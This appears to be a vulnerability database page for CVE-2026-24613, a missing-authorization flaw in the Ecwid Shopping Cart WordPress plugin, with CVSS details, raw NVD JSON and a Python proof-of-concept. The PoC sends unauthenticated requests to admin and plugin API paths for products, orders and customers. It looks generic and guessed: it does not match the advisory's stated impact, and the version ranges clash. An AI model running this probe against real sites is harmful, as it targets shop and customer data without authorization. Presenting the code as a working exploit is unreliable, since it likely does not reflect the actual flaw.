Security Vulnerability Report
中文
CVE-2026-24613 CVSS 5.3 MEDIUM

CVE-2026-24613

Published: 2026-01-23 15:16:20
Last Modified: 2026-04-28 15:16:20

Description

Missing Authorization vulnerability in Ecwid by Lightspeed Ecommerce Shopping Cart Ecwid Shopping Cart ecwid-shopping-cart allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ecwid Shopping Cart: from n/a through <= 7.0.6.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Ecwid Shopping Cart <= 7.0.6
Ecwid Shopping Cart (WordPress插件) n/a 至 7.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24613 PoC - Ecwid Shopping Cart Broken Access Control # This PoC demonstrates accessing admin functions without authentication import requests import json TARGET_URL = "http://target-wordpress-site.com" ECWID_PLUGIN_PATH = "/wp-content/plugins/ecwid-shopping-cart/" def check_vulnerability(): """Check if the Ecwid plugin is vulnerable to CVE-2026-24613""" # Try to access admin AJAX endpoint without authentication endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}{ECWID_PLUGIN_PATH}api/v1/products", f"{TARGET_URL}{ECWID_PLUGIN_PATH}api/v1/orders", f"{TARGET_URL}{ECWID_PLUGIN_PATH}api/v1/customers" ] vulnerable_endpoints = [] for endpoint in endpoints: try: # Send request without authentication headers response = requests.get(endpoint, timeout=10) # Check if response indicates missing authorization if response.status_code == 200: try: data = response.json() # If we get valid JSON data without auth, it's vulnerable if data: vulnerable_endpoints.append({ "endpoint": endpoint, "status": "VULNERABLE", "response_preview": str(data)[:200] }) except json.JSONDecodeError: # If HTML response without auth required, might be vulnerable if "wp-admin" in response.text or "dashboard" in response.text.lower(): vulnerable_endpoints.append({ "endpoint": endpoint, "status": "POTENTIALLY_VULNERABLE", "response_code": response.status_code }) except requests.RequestException as e: print(f"Error testing {endpoint}: {e}") return vulnerable_endpoints def main(): print("=" * 60) print("CVE-2026-24613 Ecwid Shopping Cart PoC") print("Missing Authorization Vulnerability") print("=" * 60) results = check_vulnerability() if results: print(f"\n[!] Found {len(results)} potentially vulnerable endpoints:") for result in results: print(f"\nEndpoint: {result['endpoint']}") print(f"Status: {result['status']}") else: print("\n[+] No obvious vulnerabilities detected") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24613", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:20.143", "lastModified": "2026-04-28T15:16:19.537", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Ecwid by Lightspeed Ecommerce Shopping Cart Ecwid Shopping Cart ecwid-shopping-cart allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ecwid Shopping Cart: from n/a through <= 7.0.6."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Ecwid por Lightspeed Ecommerce Shopping Cart Ecwid Shopping Cart ecwid-shopping-cart permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Ecwid Shopping Cart: desde n/a hasta &lt;= 7.0.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ecwid-shopping-cart/vulnerability/wordpress-ecwid-shopping-cart-plugin-7-0-5-broken-access-control-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}